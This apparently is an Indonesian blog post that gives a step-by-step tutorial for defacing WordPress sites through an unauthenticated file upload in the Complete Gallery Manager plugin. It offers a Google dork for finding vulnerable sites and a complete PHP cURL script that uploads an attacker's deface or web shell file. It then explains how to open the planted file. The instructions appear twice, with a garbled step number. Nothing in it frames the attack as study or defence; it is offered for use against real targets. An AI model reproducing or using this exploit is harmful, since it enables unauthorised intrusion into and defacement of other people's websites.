sekarang ane mau share sedikit cara untuk deface WP. jujur aja ni agak susah dan harus sabar.. baca dengan teliti, jangan sampe kelewat.. langsung aja !
alat2 :
- xampp
- script php & deface
langkah2 :
sebelumnya kita cari target dulu. masukan
dork : allinurl:/wp-content/plugins/complete-gallery-manager/frames
exploit : /wp-content/plugins/complete-gallery-manager/frames/upload-images.php
kalau muncul "error no file were uploaded". jangan panik.. emang gitu kok.. jadi ya ikuti aja langkah2 selanjutnya
kalau udah ya simpen di notepad dulu, apa ditulis dimana dulu, terserah. yg penting simpen dulu targetnya. kalau udah ikutin petunjuk berikut
1. download xampp (cari di google) & install
2. buka folder C:\xampp\ php
3. buat file namanya exploit.php
4. edit filenya pake notepad seperti ini :
untuk warna merah : tuliskan target kalian. langsung aja ganti target.com nya jadi websitenya biar cepet
untuk warna biru : ganti dengan nama file deface kalian masing2
5. lalu save. inget, extensinya tetep php
6. lalu buat 1 file lagi namanya hacked.php atau apa terserah yg penting extensinya php juga.
7. lalu isi script deface kalian
8. lalu save
jadi sekarang kita punya 2 file yaitu exploit.php dan hacked.php / script deface msing2
29. buka xampp, lalu klik tombol "shell" di sebelah kanan atas
10. ketikan "cd C:\xampp\php" tanpa tanda petik
11. lalu ketik "php exploit.php" tanpa tanda petik
12. nanti bakal keluar seprti ini
13. walau ga begitu jelas. yg penting kek gitu.. lalu copy paste script baris 1 dan baris 2, seprti yang ane mark di gambar.
14. lalu paste di sembarang tempat
15. lalu teliti disitu terselip link. walaupun pake \/
16. lu ambil linknya, lalu ganti tanda \/ jadi //. contoh : http://www.target.com//wp-content//uploads//2014//01//hacked.php
17. setelah itu buka deh linknya...
tinggal mau di obrak abrik terserah.. :D
sekian dulu, semoga bermanfaat.. :)
alat2 :
- xampp
- script php & deface
langkah2 :
sebelumnya kita cari target dulu. masukan
dork : allinurl:/wp-content/plugins/complete-gallery-manager/frames
exploit : /wp-content/plugins/complete-gallery-manager/frames/upload-images.php
kalau muncul "error no file were uploaded". jangan panik.. emang gitu kok.. jadi ya ikuti aja langkah2 selanjutnya
kalau udah ya simpen di notepad dulu, apa ditulis dimana dulu, terserah. yg penting simpen dulu targetnya. kalau udah ikutin petunjuk berikut
1. download xampp (cari di google) & install
2. buka folder C:\xampp\ php
3. buat file namanya exploit.php
4. edit filenya pake notepad seperti ini :
<?php $uploadfile="hacked.php"; $ch = curl_init("http://www.TARGET.com/wp-content/plugins/complete-gallery-manager/frames/upload-images.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('qqfile'=>"@$uploadfile")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?>PENTING :
untuk warna merah : tuliskan target kalian. langsung aja ganti target.com nya jadi websitenya biar cepet
untuk warna biru : ganti dengan nama file deface kalian masing2
5. lalu save. inget, extensinya tetep php
6. lalu buat 1 file lagi namanya hacked.php atau apa terserah yg penting extensinya php juga.
7. lalu isi script deface kalian
8. lalu save
jadi sekarang kita punya 2 file yaitu exploit.php dan hacked.php / script deface msing2
29. buka xampp, lalu klik tombol "shell" di sebelah kanan atas
10. ketikan "cd C:\xampp\php" tanpa tanda petik
11. lalu ketik "php exploit.php" tanpa tanda petik
12. nanti bakal keluar seprti ini
13. walau ga begitu jelas. yg penting kek gitu.. lalu copy paste script baris 1 dan baris 2, seprti yang ane mark di gambar.
14. lalu paste di sembarang tempat
15. lalu teliti disitu terselip link. walaupun pake \/
16. lu ambil linknya, lalu ganti tanda \/ jadi //. contoh : http://www.target.com//wp-content//uploads//2014//01//hacked.php
17. setelah itu buka deh linknya...
tinggal mau di obrak abrik terserah.. :D
sekian dulu, semoga bermanfaat.. :)
Labels:
Hacking
Thanks for reading Deface Wordpress Dengan Complete Gallery File Upload. Please share...!
2 Comment for "Deface Wordpress Dengan Complete Gallery File Upload"
gak muncul pas di ketik "php exploit.php"
gak muncul pas di ketik "php exploit.php"